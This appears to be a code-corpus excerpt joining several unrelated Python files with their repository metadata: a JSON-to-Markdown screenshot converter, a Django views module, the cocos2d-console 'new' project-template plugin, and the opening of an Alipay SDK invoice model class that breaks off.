</div>
<div style="clear: left;">
</div>
"""


def json_to_md(json_file):
    """Convert a screenshot-list JSON file into a Markdown gallery.

    The input file is a sequence of JSON objects each followed by ",\\n"
    (not a valid JSON array on its own); the trailing comma is stripped and
    the whole content is wrapped in brackets before parsing.  Every entry
    must have "header" and "image" keys and may have an optional "body".
    The output .md file is written next to the input file.

    Args:
        json_file: path to the screenshots JSON file.
    """
    src_dir = os.path.split(json_file)[0]
    base_name = os.path.splitext(os.path.split(json_file)[1])[0]
    # Use os.path.join (not src_dir + os.sep): with a bare file name like
    # "screens.json", src_dir is "" and the old concatenation produced the
    # absolute path "/screens.md" instead of "screens.md".
    md_file = os.path.join(src_dir, base_name + '.md')
    with open(json_file, 'r') as f, open(md_file, 'w') as md:
        s = f.read()
        # Strip the trailing ",\n" (robust against a missing final newline)
        # and wrap the comma-separated objects into a JSON array.
        json_s = '[' + s.rstrip().rstrip(',') + ']'
        screen_shots = json.loads(json_s)
        for screen_shot in screen_shots:
            md.write('### ' + screen_shot['header'])
            md.write('\n\n')
            md.write(PIC_FORMAT.format(img=os.path.join(src_dir, screen_shot['image']),
                                       body=screen_shot.get('body', '')))
            md.write('\n\n')
    print('{} created'.format(md_file))
if __name__ == '__main__':
    # Expect exactly one command-line argument: the screenshots JSON file.
    args = sys.argv
    if len(args) != 2:
        print('Usage {} screens.json'.format(args[0]))
    else:
        json_to_md(args[1])
| [
"spodshivalov@scmarinetech.com"
] | spodshivalov@scmarinetech.com |
884592cfa154499c47be91d6bad6bd52b7e937c4 | 83bf18586dca52274c7b0e3cf2a33a9ba1b18f33 | /exam/App/views.py | 43dc877c1e557f9227dcb8a8eb83da6d54f5de0f | [] | no_license | peinniku/django-first-touch | ddf1c27903c25d2a7f5abb97e8060472b899d6e0 | 1396b042502fadbd7b38e469fc62a1f02eaf3d02 | refs/heads/master | 2023-02-19T05:57:12.549076 | 2021-01-21T11:42:08 | 2021-01-21T11:42:08 | 331,605,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | from django.http import HttpResponse
from django.shortcuts import render, redirect
# Create your views here.
from django.urls import reverse
from App.models import User
def index(request):
    """Render the home page, passing every ``User`` row to the template."""
    users = User.objects.all()
    # Note: '用戶' is a user-facing (Chinese) label consumed by the template.
    return render(request, 'index.html', context={'title': 'django', 'name': '用戶', 'users': users})
# return HttpResponse('首頁')  -- old plain-text response, kept for reference
def get_name(request, name):
    """Echo the ``name`` URL parameter back as a plain-text response."""
    # Debug output: the full query dict and every 'age' value in the query string.
    print(request.GET)
    print(request.GET.getlist('age'))
    return HttpResponse(name)
def http_redirect(request):
    """Redirect to the ``tel`` view with a hard-coded phone number."""
    return redirect(reverse('tel', args=('1234-56795978',)))
def tel(request, phone):
    """Return the captured ``phone`` URL parameter as plain text."""
    return HttpResponse(phone)
| [
"1078228403@qq.com"
] | 1078228403@qq.com |
7be6fc930083d7aaee6527c344ddea013c549bbe | c08ae967923c09d53de575167f160cadd56acb15 | /tools/cocos2d-console/plugins/plugin_new/project_new.py | 5af8450179cf3dd3a3f4ffb647910f0c68c81d75 | [
"MIT"
] | permissive | namkazt/cocos2dx-lite | 9e41b2380443785027027cb9d357dd39f2e79df4 | 4d6f0702d30a5bc6f46f6da10f9c29678e0d0127 | refs/heads/master | 2021-01-17T22:18:35.981597 | 2016-08-14T05:24:51 | 2016-08-14T05:24:51 | 62,821,903 | 2 | 0 | null | 2016-07-07T16:30:23 | 2016-07-07T16:30:22 | null | UTF-8 | Python | false | false | 27,998 | py | #!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "new" plugin
#
# Copyright 2013 (C) cocos2d-x.org
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"new" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
# python
import os
import sys
import getopt
import ConfigParser
import json
import shutil
import cocos
from MultiLanguage import MultiLanguage
import cocos_project
import re
import utils
from collections import OrderedDict
#
# Plugins should be a sublass of CCJSPlugin
#
class CCPluginNew(cocos.CCPlugin):
    """Implements ``cocos new``: creates a new cpp/lua/js project from a
    template.

    Python 2 code (uses ``unicode``, ``has_key``); port with care.
    """
    # Fallback project names, keyed by language, used when no name is given.
    DEFAULT_PROJ_NAME = {
        cocos_project.Project.CPP: 'MyCppGame',
        cocos_project.Project.LUA: 'MyLuaGame',
        cocos_project.Project.JS: 'MyJSGame'
    }
    @staticmethod
    def plugin_name():
        return "new"
    @staticmethod
    def brief_description():
        return MultiLanguage.get_string('NEW_BRIEF')
    def init(self, args):
        """Cache the parsed arguments and resolve template/engine paths."""
        self._projname = args.name
        self._projdir = unicode(
            os.path.abspath(os.path.join(args.directory, self._projname)), "utf-8")
        self._lang = args.language
        self._package = args.package
        self._tpname = args.template
        # new official ways to get the template and cocos paths
        self._templates_paths = self.get_templates_paths()
        self._cocosroot = self.get_cocos2d_path()
        # search for custom paths
        if args.engine_path is not None:
            self._cocosroot = os.path.abspath(args.engine_path)
            self._cocosroot = unicode(self._cocosroot, "utf-8")
            tp_path = os.path.join(self._cocosroot, "templates")
            if os.path.isdir(tp_path):
                self._templates_paths.append(tp_path)
        # remove duplicates keeping order
        o = OrderedDict.fromkeys(self._templates_paths)
        self._templates_paths = o.keys()
        self._other_opts = args
        self._mac_bundleid = args.mac_bundleid
        self._ios_bundleid = args.ios_bundleid
        # Ask the user to pick a template interactively when none matched.
        self._templates = Templates(args.language, self._templates_paths, args.template)
        if self._templates.none_active():
            self._templates.select_one()
    # parse arguments
    def parse_args(self, argv):
        """Custom and check param list.
        """
        from argparse import ArgumentParser
        # set the parser to parse input params
        # the correspond variable name of "-x, --xxx" is parser.xxx
        name = CCPluginNew.plugin_name()
        category = CCPluginNew.plugin_category()
        parser = ArgumentParser(prog="cocos %s" % self.__class__.plugin_name(),
                                description=self.__class__.brief_description())
        parser.add_argument(
            "name", metavar="PROJECT_NAME", nargs='?', help=MultiLanguage.get_string('NEW_ARG_NAME'))
        parser.add_argument(
            "-p", "--package", metavar="PACKAGE_NAME", help=MultiLanguage.get_string('NEW_ARG_PACKAGE'))
        parser.add_argument("-l", "--language",
                            required=True,
                            choices=["cpp", "lua", "js"],
                            help=MultiLanguage.get_string('NEW_ARG_LANG'))
        parser.add_argument("-d", "--directory", metavar="DIRECTORY",
                            help=MultiLanguage.get_string('NEW_ARG_DIR'))
        parser.add_argument("-t", "--template", metavar="TEMPLATE_NAME",
                            help=MultiLanguage.get_string('NEW_ARG_TEMPLATE'))
        parser.add_argument(
            "--ios-bundleid", dest="ios_bundleid", help=MultiLanguage.get_string('NEW_ARG_IOS_BUNDLEID'))
        parser.add_argument(
            "--mac-bundleid", dest="mac_bundleid", help=MultiLanguage.get_string('NEW_ARG_MAC_BUNDLEID'))
        parser.add_argument("-e", "--engine-path", dest="engine_path",
                            help=MultiLanguage.get_string('NEW_ARG_ENGINE_PATH'))
        parser.add_argument("--portrait", action="store_true", dest="portrait",
                            help=MultiLanguage.get_string('NEW_ARG_PORTRAIT'))
        group = parser.add_argument_group(MultiLanguage.get_string('NEW_ARG_GROUP_SCRIPT'))
        group.add_argument(
            "--no-native", action="store_true", dest="no_native",
            help=MultiLanguage.get_string('NEW_ARG_NO_NATIVE'))
        # parse the params
        args = parser.parse_args(argv)
        # Fill in defaults derived from other arguments.
        if args.name is None:
            args.name = CCPluginNew.DEFAULT_PROJ_NAME[args.language]
        if not args.package:
            args.package = "org.cocos2dx.%s" % args.name
        if not args.ios_bundleid:
            args.ios_bundleid = args.package
        if not args.mac_bundleid:
            args.mac_bundleid = args.package
        if not args.directory:
            args.directory = os.getcwd()
        if not args.template:
            args.template = 'default'
        self.init(args)
        return args
    def _stat_engine_version(self):
        """Best-effort usage statistics: detect the engine flavor/version
        and report it. Never raises (all failures are swallowed)."""
        try:
            ver_str = None
            engine_type = None
            framework_ver_file = os.path.join(self._cocosroot, 'version')
            x_ver_file = os.path.join(self._cocosroot, 'cocos/cocos2d.cpp')
            js_ver_file = os.path.join(self._cocosroot, 'frameworks/js-bindings/bindings/manual/ScriptingCore.h')
            if os.path.isfile(framework_ver_file):
                # the engine is Cocos Framework
                f = open(framework_ver_file)
                ver_str = f.read()
                f.close()
                engine_type = 'cocosframework'
            else:
                ver_file = None
                pattern = None
                if os.path.isfile(x_ver_file):
                    # the engine is cocos2d-x
                    pattern = r".*return[ \t]+\"(.*)\";"
                    ver_file = x_ver_file
                    engine_type = 'cocos2d-x'
                elif os.path.isfile(js_ver_file):
                    # the engine is cocos2d-js
                    pattern = r".*#define[ \t]+ENGINE_VERSION[ \t]+\"(.*)\""
                    ver_file = js_ver_file
                    engine_type = 'cocos2d-js'
                if ver_file is not None:
                    # Scan the source file for the version string literal.
                    f = open(ver_file)
                    import re
                    for line in f.readlines():
                        match = re.match(pattern, line)
                        if match:
                            ver_str = match.group(1)
                            break
                    f.close()
            if ver_str is not None:
                # stat the engine version info
                cocos.DataStatistic.stat_event('new_engine_ver', ver_str, engine_type)
        except:
            pass
    def _create_from_cmd(self):
        """Create the project directory from the selected template and
        write the project's ``.cocos-project.json`` config."""
        # check the dst project dir exists
        if os.path.exists(self._projdir):
            message = MultiLanguage.get_string('NEW_ERROR_FOLDER_EXISTED_FMT', self._projdir)
            raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
        tp_dir = self._templates.template_path()
        creator = TPCreator(self._lang, self._cocosroot, self._projname, self._projdir,
                            self._tpname, tp_dir, self._package, self._mac_bundleid, self._ios_bundleid)
        # do the default creating step
        creator.do_default_step()
        data = None
        cfg_path = os.path.join(self._projdir, cocos_project.Project.CONFIG)
        if os.path.isfile(cfg_path):
            f = open(cfg_path)
            data = json.load(f)
            f.close()
        if data is None:
            data = {}
        if cocos_project.Project.KEY_PROJ_TYPE not in data:
            data[cocos_project.Project.KEY_PROJ_TYPE] = self._lang
        # script project may add native support
        if self._lang in (cocos_project.Project.LUA, cocos_project.Project.JS):
            if not self._other_opts.no_native:
                creator.do_other_step('do_add_native_support')
                data[cocos_project.Project.KEY_HAS_NATIVE] = True
            else:
                data[cocos_project.Project.KEY_HAS_NATIVE] = False
        # record the engine version if not predefined
        if not data.has_key(cocos_project.Project.KEY_ENGINE_VERSION):
            engine_version = utils.get_engine_version(self._cocosroot)
            if engine_version is not None:
                data[cocos_project.Project.KEY_ENGINE_VERSION] = engine_version
        # if --portrait is specified, change the orientation
        if self._other_opts.portrait:
            creator.do_other_step("change_orientation", not_existed_error=False)
        # write config files
        with open(cfg_path, 'w') as outfile:
            json.dump(data, outfile, sort_keys=True, indent=4)
    # main entry point
    def run(self, argv, dependencies):
        """Parse args, report usage statistics, then create the project."""
        self.parse_args(argv)
        action_str = 'new_%s' % (self._lang)
        cocos.DataStatistic.stat_event('new', action_str, self._tpname)
        self._create_from_cmd()
        self._stat_engine_version()
def replace_string(filepath, src_string, dst_string):
    """Replace every occurrence of ``src_string`` with ``dst_string`` in a file.

    The file is read as UTF-8 and rewritten in place.  Unlike the previous
    line-by-line implementation, this also handles search strings that span
    multiple lines, and closes the file handles even on error.

    Args:
        filepath: path of the file to rewrite.
        src_string: substring to search for (must not be None).
        dst_string: replacement substring (must not be None).

    Raises:
        TypeError: if either src_string or dst_string is None.
    """
    if src_string is None or dst_string is None:
        raise TypeError("src_string and dst_string must not be None")
    # Read/decode the whole file, substitute, then re-encode and overwrite;
    # `with` guarantees the handles are closed.
    with open(filepath, "rb") as src_file:
        content = src_file.read().decode('utf8')
    content = content.replace(src_string, dst_string)
    with open(filepath, "wb") as dst_file:
        dst_file.write(content.encode('utf8'))
# end of replace_string
class Templates(object):
    """Discovers project templates (``<lang>-template-<name>`` folders)
    under a list of template search paths and tracks the selected one.

    Python 2 code: ``_scan``/``select_one`` index ``dict.keys()`` directly,
    which only works because Py2 ``keys()`` returns a list; ``raw_input``
    is Py2-only as well.
    """
    def __init__(self, lang, templates_paths, current):
        self._lang = lang
        self._templates_paths = templates_paths
        self._scan()
        self._current = None
        # Accept the requested template only if the scan actually found it.
        if current is not None:
            if current in self._template_folders:
                self._current = current
            else:
                cocos.Logging.warning(MultiLanguage.get_string('NEW_TEMPLATE_NOT_FOUND_FMT', current))
    def _scan(self):
        """Populate ``_template_folders`` (name -> absolute folder path).
        Raises CCPluginError when no template for the language is found."""
        template_pattern = {
            "cpp": 'cpp-template-(.+)',
            "lua": 'lua-template-(.+)',
            "js": 'js-template-(.+)',
        }
        self._template_folders = {}
        for templates_dir in self._templates_paths:
            try:
                dirs = [name for name in os.listdir(templates_dir) if os.path.isdir(
                    os.path.join(templates_dir, name))]
            except Exception:
                # Unreadable/missing search path: just skip it.
                continue
            pattern = template_pattern[self._lang]
            for name in dirs:
                match = re.search(pattern, name)
                if match is None:
                    continue
                template_name = match.group(1)
                # First match wins: earlier search paths take precedence.
                if template_name in self._template_folders.keys():
                    continue
                self._template_folders[template_name] = os.path.join(templates_dir, name)
        if len(self._template_folders) == 0:
            cur_engine = "cocos2d-x" if self._lang == "js" else "cocos2d-js"
            need_engine = "cocos2d-js" if self._lang == "js" else "cocos2d-x"
            engine_tip = MultiLanguage.get_string('NEW_ERROR_ENGINE_TIP_FMT', need_engine)
            message = MultiLanguage.get_string('NEW_ERROR_TEMPLATE_NOT_FOUND_FMT', (self._lang, engine_tip))
            raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
    def none_active(self):
        """Return True when no template has been selected yet."""
        return self._current is None
    def template_path(self):
        """Return the selected template's folder, or None if none selected."""
        if self._current is None:
            return None
        return self._template_folders[self._current]
    def select_one(self):
        """Interactively prompt the user to pick one of the found templates."""
        cocos.Logging.warning(MultiLanguage.get_string('NEW_SELECT_TEMPLATE_TIP1'))
        p = self._template_folders.keys()
        for i in range(len(p)):
            cocos.Logging.warning('%d %s' % (i + 1, p[i]))
        cocos.Logging.warning(MultiLanguage.get_string('NEW_SELECT_TEMPLATE_TIP2'))
        # Loop until a number within the valid 1..len(p) range is entered.
        while True:
            option = raw_input()
            if option.isdigit():
                option = int(option) - 1
                if option in range(len(p)):
                    break
        self._current = p[option]
class TPCreator(object):
    """Executes the steps described by a template's
    ``cocos-project-template.json`` to materialize a new project.

    The JSON maps step names to command dicts; each key of a command dict
    is the name of a method on this class (dispatched via ``getattr`` in
    ``do_cmds``).  Python 2 code (``iteritems``, ``json.load`` encoding arg).
    """
    def __init__(self, lang, cocos_root, project_name, project_dir, tp_name, tp_dir, project_package, mac_id, ios_id):
        self.lang = lang
        self.cocos_root = cocos_root
        self.project_dir = project_dir
        self.project_name = project_name
        self.package_name = project_package
        self.mac_bundleid = mac_id
        self.ios_bundleid = ios_id
        self.tp_name = tp_name
        self.tp_dir = tp_dir
        self.tp_json = 'cocos-project-template.json'
        tp_json_path = os.path.join(tp_dir, self.tp_json)
        if not os.path.exists(tp_json_path):
            message = MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT', tp_json_path)
            raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
        f = open(tp_json_path)
        # keep the key order
        tpinfo = json.load(f, encoding='utf8', object_pairs_hook=OrderedDict)
        # read the default creating step
        if 'do_default' not in tpinfo:
            message = (MultiLanguage.get_string('NEW_ERROR_DEFAILT_CFG_NOT_FOUND_FMT', tp_json_path))
            raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_WRONG_CONFIG)
        self.tp_default_step = tpinfo.pop('do_default')
        # keep the other steps
        self.tp_other_step = tpinfo
    def cp_self(self, project_dir, exclude_files):
        """Copy the template folder into the project dir, minus exclusions."""
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_COPY_TEMPLATE_FMT', project_dir))
        if not os.path.exists(self.project_dir):
            os.makedirs(self.project_dir)
        copy_cfg = {
            "from": self.tp_dir,
            "to": self.project_dir,
            "exclude": exclude_files
        }
        cocos.copy_files_with_config(copy_cfg, self.tp_dir, self.project_dir)
    def do_default_step(self):
        """Run the mandatory 'do_default' step: copy template, then its commands."""
        default_cmds = self.tp_default_step
        exclude_files = []
        if "exclude_from_template" in default_cmds:
            exclude_files = exclude_files + \
                default_cmds['exclude_from_template']
            default_cmds.pop('exclude_from_template')
        # should ignore teh xx-template-xx.json
        exclude_files.append(self.tp_json)
        self.cp_self(self.project_dir, exclude_files)
        self.do_cmds(default_cmds)
    def do_other_step(self, step, not_existed_error=True):
        """Run a named optional step; missing steps are an error or a warning
        depending on ``not_existed_error``."""
        if step not in self.tp_other_step:
            if not_existed_error:
                # handle as error
                message = MultiLanguage.get_string('NEW_ERROR_STEP_NOT_FOUND_FMT', step)
                raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_WRONG_CONFIG)
            else:
                # handle as warning
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_STEP_NOT_FOUND_FMT', step))
                return
        cmds = self.tp_other_step[step]
        self.do_cmds(cmds)
    def do_cmds(self, cmds):
        """Dispatch each command key to the method of the same name."""
        for k, v in cmds.iteritems():
            # call cmd method by method/cmd name
            # get from
            # http://stackoverflow.com/questions/3951840/python-how-to-invoke-an-function-on-an-object-dynamically-by-name
            try:
                cmd = getattr(self, k)
            except AttributeError:
                raise cocos.CCPluginError(MultiLanguage.get_string('NEW_ERROR_CMD_NOT_FOUND_FMT', k),
                                          cocos.CCPluginError.ERROR_WRONG_CONFIG)
            try:
                cmd(v)
            except Exception as e:
                raise cocos.CCPluginError(str(e), cocos.CCPluginError.ERROR_RUNNING_CMD)
    # cmd methods below
    def append_h5_engine(self, v):
        """Copy the cocos2d-html5 engine files (per moduleConfig.json) into
        the project."""
        src = os.path.join(self.cocos_root, v['from'])
        dst = os.path.join(self.project_dir, v['to'])
        # check cocos engine exist
        moduleConfig = 'moduleConfig.json'
        moudle_cfg = os.path.join(src, moduleConfig)
        if not os.path.exists(moudle_cfg):
            message = MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT', moudle_cfg)
            raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
        f = open(moudle_cfg)
        data = json.load(f, 'utf8')
        f.close()
        modules = data['module']
        # must copy moduleConfig.json & CCBoot.js
        file_list = [moduleConfig, data['bootFile']]
        # NOTE(review): the loop below rebinds `v` and `f` from the outer
        # scope; harmless here because neither is used afterwards.
        for k, v in modules.iteritems():
            module = modules[k]
            for f in module:
                if f[-2:] == 'js':
                    file_list.append(f)
        # begin copy engine
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_COPY_H5'))
        for index in range(len(file_list)):
            srcfile = os.path.join(src, file_list[index])
            dstfile = os.path.join(dst, file_list[index])
            srcfile = cocos.add_path_prefix(srcfile)
            dstfile = cocos.add_path_prefix(dstfile)
            if not os.path.exists(os.path.dirname(dstfile)):
                os.makedirs(cocos.add_path_prefix(os.path.dirname(dstfile)))
            # copy file or folder
            if os.path.exists(srcfile):
                if os.path.isdir(srcfile):
                    if os.path.exists(dstfile):
                        shutil.rmtree(dstfile)
                    shutil.copytree(srcfile, dstfile)
                else:
                    if os.path.exists(dstfile):
                        os.remove(dstfile)
                    shutil.copy2(srcfile, dstfile)
    def append_x_engine(self, v):
        """Copy the cocos2d-x engine files (per cocos2dx_files.json) into
        the project; skipped entirely in 'distro' mode."""
        # FIXME this is a hack, but in order to fix it correctly the cocos-project-template.json
        # file probably will need to be re-designed.
        # As a quick (horrible) fix, we check if we are in distro mode.
        # If so, we don't do the "append_x_engine" step
        if cocos.CCPlugin.get_cocos2d_mode() == 'distro':
            return
        src = os.path.join(self.cocos_root, v['from'])
        dst = os.path.join(self.project_dir, v['to'])
        # check cocos engine exist
        cocosx_files_json = os.path.join(
            src, 'templates', 'cocos2dx_files.json')
        if not os.path.exists(cocosx_files_json):
            message = MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT', cocosx_files_json)
            raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
        f = open(cocosx_files_json)
        data = json.load(f)
        f.close()
        fileList = data['common']
        if self.lang == 'lua':
            fileList = fileList + data['lua']
        if self.lang == 'js' and 'js' in data.keys():
            fileList = fileList + data['js']
        # begin copy engine
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_COPY_X'))
        for index in range(len(fileList)):
            srcfile = os.path.join(src, fileList[index])
            dstfile = os.path.join(dst, fileList[index])
            srcfile = cocos.add_path_prefix(srcfile)
            dstfile = cocos.add_path_prefix(dstfile)
            if not os.path.exists(os.path.dirname(dstfile)):
                os.makedirs(cocos.add_path_prefix(os.path.dirname(dstfile)))
            # copy file or folder
            if os.path.exists(srcfile):
                if os.path.isdir(srcfile):
                    if os.path.exists(dstfile):
                        shutil.rmtree(dstfile)
                    shutil.copytree(srcfile, dstfile)
                else:
                    if os.path.exists(dstfile):
                        os.remove(dstfile)
                    shutil.copy2(srcfile, dstfile)
    def append_from_template(self, v):
        """Copy extra files from the template folder per copy-config ``v``."""
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_APPEND_TEMPLATE'))
        cocos.copy_files_with_config(v, self.tp_dir, self.project_dir)
    def append_dir(self, v):
        """Copy directories from the engine root per a list of copy-configs."""
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_APPEND_DIR'))
        for item in v:
            cocos.copy_files_with_config(
                item, self.cocos_root, self.project_dir)
    def append_file(self, v):
        """Copy individual files from the engine root into the project."""
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_APPEND_FILE'))
        for item in v:
            src = os.path.join(self.cocos_root, item['from'])
            dst = os.path.join(self.project_dir, item['to'])
            src = cocos.add_path_prefix(src)
            dst = cocos.add_path_prefix(dst)
            shutil.copy2(src, dst)
    # project cmd
    def project_rename(self, v):
        """ will modify the file name of the file
        """
        dst_project_dir = self.project_dir
        dst_project_name = self.project_name
        src_project_name = v['src_project_name']
        if dst_project_name == src_project_name:
            return
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_RENAME_PROJ_FMT',
                                                    (src_project_name, dst_project_name)))
        files = v['files']
        for f in files:
            src = f.replace("PROJECT_NAME", src_project_name)
            dst = f.replace("PROJECT_NAME", dst_project_name)
            src_file_path = os.path.join(dst_project_dir, src)
            dst_file_path = os.path.join(dst_project_dir, dst)
            if os.path.exists(src_file_path):
                if dst_project_name.lower() == src_project_name.lower():
                    # Names differ only in case: go through a temp name so the
                    # rename works on case-insensitive filesystems.
                    temp_file_path = "%s-temp" % src_file_path
                    os.rename(src_file_path, temp_file_path)
                    os.rename(temp_file_path, dst_file_path)
                else:
                    if os.path.exists(dst_file_path):
                        os.remove(dst_file_path)
                    os.rename(src_file_path, dst_file_path)
            else:
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
                                                               os.path.join(dst_project_dir, src)))
    def project_replace_project_name(self, v):
        """ will modify the content of the file
        """
        dst_project_dir = self.project_dir
        dst_project_name = self.project_name
        src_project_name = v['src_project_name']
        if dst_project_name == src_project_name:
            return
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_REPLACE_PROJ_FMT',
                                                    (src_project_name, dst_project_name)))
        files = v['files']
        for f in files:
            dst = f.replace("PROJECT_NAME", dst_project_name)
            if os.path.exists(os.path.join(dst_project_dir, dst)):
                replace_string(
                    os.path.join(dst_project_dir, dst), src_project_name, dst_project_name)
            else:
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
                                                               os.path.join(dst_project_dir, dst)))
    def project_replace_package_name(self, v):
        """ will modify the content of the file
        """
        dst_project_dir = self.project_dir
        dst_project_name = self.project_name
        src_package_name = v['src_package_name']
        dst_package_name = self.package_name
        if dst_package_name == src_package_name:
            return
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_REPLACE_PKG_FMT',
                                                    (src_package_name, dst_package_name)))
        files = v['files']
        if not dst_package_name:
            raise cocos.CCPluginError(MultiLanguage.get_string('NEW_ERROR_PKG_NAME_NOT_SPECIFIED'),
                                      cocos.CCPluginError.ERROR_WRONG_ARGS)
        for f in files:
            dst = f.replace("PROJECT_NAME", dst_project_name)
            if os.path.exists(os.path.join(dst_project_dir, dst)):
                replace_string(
                    os.path.join(dst_project_dir, dst), src_package_name, dst_package_name)
            else:
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
                                                               os.path.join(dst_project_dir, dst)))
    def project_replace_mac_bundleid(self, v):
        """ will modify the content of the file
        """
        if self.mac_bundleid is None:
            return
        dst_project_dir = self.project_dir
        dst_project_name = self.project_name
        src_bundleid = v['src_bundle_id']
        dst_bundleid = self.mac_bundleid
        if src_bundleid == dst_bundleid:
            return
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_MAC_BUNDLEID_FMT',
                                                    (src_bundleid, dst_bundleid)))
        files = v['files']
        for f in files:
            dst = f.replace("PROJECT_NAME", dst_project_name)
            if os.path.exists(os.path.join(dst_project_dir, dst)):
                replace_string(
                    os.path.join(dst_project_dir, dst), src_bundleid, dst_bundleid)
            else:
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
                                                               os.path.join(dst_project_dir, dst)))
    def project_replace_ios_bundleid(self, v):
        """ will modify the content of the file
        """
        if self.ios_bundleid is None:
            return
        dst_project_dir = self.project_dir
        dst_project_name = self.project_name
        src_bundleid = v['src_bundle_id']
        dst_bundleid = self.ios_bundleid
        if src_bundleid == dst_bundleid:
            return
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_IOS_BUNDLEID_FMT',
                                                    (src_bundleid, dst_bundleid)))
        files = v['files']
        for f in files:
            dst = f.replace("PROJECT_NAME", dst_project_name)
            if os.path.exists(os.path.join(dst_project_dir, dst)):
                replace_string(
                    os.path.join(dst_project_dir, dst), src_bundleid, dst_bundleid)
            else:
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
                                                               os.path.join(dst_project_dir, dst)))
    def modify_files(self, v):
        """ will modify the content of the file
        format of v is :
        [
            {
                "file_path": The path related with project directory,
                "pattern": Find pattern,
                "replace_string": Replaced string
            },
            ...
        ]
        """
        cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_MODIFY_FILE'))
        for modify_info in v:
            modify_file = modify_info["file_path"]
            if not os.path.isabs(modify_file):
                modify_file = os.path.abspath(os.path.join(self.project_dir, modify_file))
            if not os.path.isfile(modify_file):
                cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_NOT_A_FILE_FMT', modify_file))
                continue
            pattern = modify_info["pattern"]
            replace_str = modify_info["replace_string"]
            # Apply the regex substitution line by line, then rewrite the file.
            f = open(modify_file)
            lines = f.readlines()
            f.close()
            new_lines = []
            for line in lines:
                new_line = re.sub(pattern, replace_str, line)
                new_lines.append(new_line)
            f = open(modify_file, "w")
            f.writelines(new_lines)
            f.close()
| [
"jimmy.yin5@gmail.com"
] | jimmy.yin5@gmail.com |
d63e37f24e963205d5ab81509b9fb9b544d6dc56 | 0b01cb61a4ae4ae236a354cbfa23064e9057e434 | /alipay/aop/api/domain/InvoiceQueryOpenModel.py | e4a1f2eb763c0a192adc00a055403a1ea79f277d | [
"Apache-2.0"
] | permissive | hipacloud/alipay-sdk-python-all | e4aec2869bf1ea6f7c6fb97ac7cc724be44ecd13 | bdbffbc6d5c7a0a3dd9db69c99443f98aecf907d | refs/heads/master | 2022-11-14T11:12:24.441822 | 2020-07-14T03:12:15 | 2020-07-14T03:12:15 | 277,970,730 | 0 | 0 | Apache-2.0 | 2020-07-08T02:33:15 | 2020-07-08T02:33:14 | null | UTF-8 | Python | false | false | 18,343 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.InvoiceItemQueryOpenModel import InvoiceItemQueryOpenModel
from alipay.aop.api.domain.InvoiceTitleQueryOpenModel import InvoiceTitleQueryOpenModel
class InvoiceQueryOpenModel(object):
    """Model describing a queried invoice in the Alipay open API.

    The auto-generated original spelled out an identical property pair and
    serialization branch for each of its 32 fields (~470 lines).  This
    table-driven rewrite keeps the exact same public surface -- every field
    is still a read/write property, and ``to_alipay_dict`` /
    ``from_alipay_dict`` behave identically -- while defining the plain
    pass-through fields only once.
    """

    # Fields whose getter/setter simply store the value unchanged.
    # (`invoice_content` and `invoice_title` have converting setters below.)
    _PLAIN_FIELDS = (
        'apply_from', 'check_code', 'checker', 'clerk', 'einv_code',
        'einv_no', 'ex_tax_amount', 'invoice_amount', 'invoice_date',
        'invoice_id', 'invoice_kind', 'invoice_memo', 'invoice_type',
        'm_short_name', 'ori_blue_inv_code', 'ori_blue_inv_no',
        'out_apply_id', 'out_trade_no', 'payee', 'payee_address',
        'payee_bank_account', 'payee_bank_name', 'payee_register_name',
        'payee_register_no', 'payee_tel', 'preview_image_url',
        'sub_m_short_name', 'sum_tax_amount', 'trade_date', 'user_id',
    )

    def __init__(self):
        # Every field starts out unset (None); to_alipay_dict skips them.
        for name in self._PLAIN_FIELDS:
            setattr(self, '_' + name, None)
        self._invoice_content = None
        self._invoice_title = None

    @property
    def invoice_content(self):
        return self._invoice_content

    @invoice_content.setter
    def invoice_content(self, value):
        # NOTE: like the generated original, a non-list assignment is
        # silently ignored (the attribute keeps its previous value).
        if isinstance(value, list):
            self._invoice_content = list()
            for i in value:
                if isinstance(i, InvoiceItemQueryOpenModel):
                    self._invoice_content.append(i)
                else:
                    self._invoice_content.append(InvoiceItemQueryOpenModel.from_alipay_dict(i))

    @property
    def invoice_title(self):
        return self._invoice_title

    @invoice_title.setter
